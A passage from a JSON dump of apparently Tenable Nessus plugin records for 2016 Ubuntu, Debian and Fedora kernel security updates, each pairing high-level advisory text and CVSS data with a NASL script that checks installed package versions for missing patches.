"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-3098-2.NASL", "href": "https://www.tenable.com/plugins/nessus/93955", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3098-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93955);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3098-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-3098-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3098-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3098-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-98-generic\", pkgver:\"3.13.0-98.145~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-98-generic-lpae\", pkgver:\"3.13.0-98.145~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:43:57", "description": "This update fixes the CVEs described below.\n\nCVE-2016-3857\n\nChiachih Wu reported two bugs in the ARM OABI compatibility layer that\ncan be used by local users for privilege escalation. The OABI\ncompatibility layer is enabled in all kernel flavours for armel and\narmhf.\n\nCVE-2016-4470\n\nWade Mealing of the Red Hat Product Security Team reported that in\nsome error cases the KEYS subsystem will dereference an uninitialised\npointer. A local user can use the keyctl() system call for denial of\nservice (crash) or possibly for privilege escalation.\n\nCVE-2016-5696\n\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa M.\nMarvel of the United States Army Research Laboratory discovered that\nLinux's implementation of the TCP Challenge ACK feature results in a\nside channel that can be used to find TCP connections between specific\nIP addresses, and to inject messages into those connections.\n\nWhere a service is made available through TCP, this may\nallow remote attackers to impersonate another connected user\nto the server or to impersonate the server to another\nconnected user. In case the service uses a protocol with\nmessage authentication (e.g. TLS or SSH), this vulnerability\nonly allows denial of service (connection failure). An\nattack takes tens of seconds, so short-lived TCP connections\nare also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded: sysctl\nnet.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\nSeveral heap-based buffer overflow vulnerabilities were found in the\nhiddev driver, allowing a local user with access to a HID device to\ncause a denial of service or potentially escalate their privileges.\n\nCVE-2016-6136\n\nPengfei Wang discovered that the audit subsystem has a 'double-fetch'\nor 'TOCTTOU' bug in its handling of special characters in the name of\nan executable. Where audit logging of execve() is enabled, this allows\na local user to generate misleading log messages.\n\nCVE-2016-6480\n\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or 'TOCTTOU' bug in its validation of\n'FIB' messages passed through the ioctl() system call. This has no\npractical security impact in current Debian releases.\n\nCVE-2016-6828\n\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The security\nimpact is unclear, but might include denial of service or privilege\nescalation.\n\nCVE-2016-7118\n\nMarcin Szewczyk reported that calling fcntl() on a file descriptor for\na directory on an aufs filesystem would result in am 'oops'. This\nallows local users to cause a denial of service. This is a\nDebian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 'Jessie', CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version\n3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-06T00:00:00", "title": "Debian DLA-609-1 : linux security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-7118", "CVE-2016-5696", "CVE-2016-3857", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-5829", "CVE-2016-4470"], "modified": "2016-09-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DLA-609.NASL", "href": "https://www.tenable.com/plugins/nessus/93321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-609-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93321);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3857\", \"CVE-2016-4470\", \"CVE-2016-5696\", \"CVE-2016-5829\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7118\");\n\n script_name(english:\"Debian DLA-609-1 : linux security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVEs described below.\n\nCVE-2016-3857\n\nChiachih Wu reported two bugs in the ARM OABI compatibility layer that\ncan be used by local users for privilege escalation. The OABI\ncompatibility layer is enabled in all kernel flavours for armel and\narmhf.\n\nCVE-2016-4470\n\nWade Mealing of the Red Hat Product Security Team reported that in\nsome error cases the KEYS subsystem will dereference an uninitialised\npointer. A local user can use the keyctl() system call for denial of\nservice (crash) or possibly for privilege escalation.\n\nCVE-2016-5696\n\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa M.\nMarvel of the United States Army Research Laboratory discovered that\nLinux's implementation of the TCP Challenge ACK feature results in a\nside channel that can be used to find TCP connections between specific\nIP addresses, and to inject messages into those connections.\n\nWhere a service is made available through TCP, this may\nallow remote attackers to impersonate another connected user\nto the server or to impersonate the server to another\nconnected user. In case the service uses a protocol with\nmessage authentication (e.g. TLS or SSH), this vulnerability\nonly allows denial of service (connection failure). An\nattack takes tens of seconds, so short-lived TCP connections\nare also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded: sysctl\nnet.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\nSeveral heap-based buffer overflow vulnerabilities were found in the\nhiddev driver, allowing a local user with access to a HID device to\ncause a denial of service or potentially escalate their privileges.\n\nCVE-2016-6136\n\nPengfei Wang discovered that the audit subsystem has a 'double-fetch'\nor 'TOCTTOU' bug in its handling of special characters in the name of\nan executable. Where audit logging of execve() is enabled, this allows\na local user to generate misleading log messages.\n\nCVE-2016-6480\n\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or 'TOCTTOU' bug in its validation of\n'FIB' messages passed through the ioctl() system call. This has no\npractical security impact in current Debian releases.\n\nCVE-2016-6828\n\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The security\nimpact is unclear, but might include denial of service or privilege\nescalation.\n\nCVE-2016-7118\n\nMarcin Szewczyk reported that calling fcntl() on a file descriptor for\na directory on an aufs filesystem would result in am 'oops'. This\nallows local users to cause a denial of service. This is a\nDebian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 'Jessie', CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version\n3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected linux package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.81-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:02", "description": "The -101 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to 4.7.2. The 4.7.2 contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Fedora 23 : kernel (2016-f1adaaadc6)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F1ADAAADC6.NASL", "href": "https://www.tenable.com/plugins/nessus/93332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-f1adaaadc6.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93332);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"FEDORA\", value:\"2016-f1adaaadc6\");\n\n script_name(english:\"Fedora 23 : kernel (2016-f1adaaadc6)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The -101 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to 4.7.2. The 4.7.2 contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-f1adaaadc6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-f1adaaadc6\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.7.2-101.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:04", "description": "The -201 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to the 4.7.2 kernel. The 4.7.2 update contains a\nnumber of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Fedora 24 : kernel (2016-2e5ebfed6d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-2E5EBFED6D.NASL", "href": "https://www.tenable.com/plugins/nessus/93326", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2e5ebfed6d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93326);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"FEDORA\", value:\"2016-2e5ebfed6d\");\n\n script_name(english:\"Fedora 24 : kernel (2016-2e5ebfed6d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The -201 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to the 4.7.2 kernel. The 4.7.2 update contains a\nnumber of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2e5ebfed6d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-2e5ebfed6d\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.7.2-201.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:26", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 16.04 LTS : linux-raspi2 vulnerabilities (USN-3099-3)", "type": "nessus", 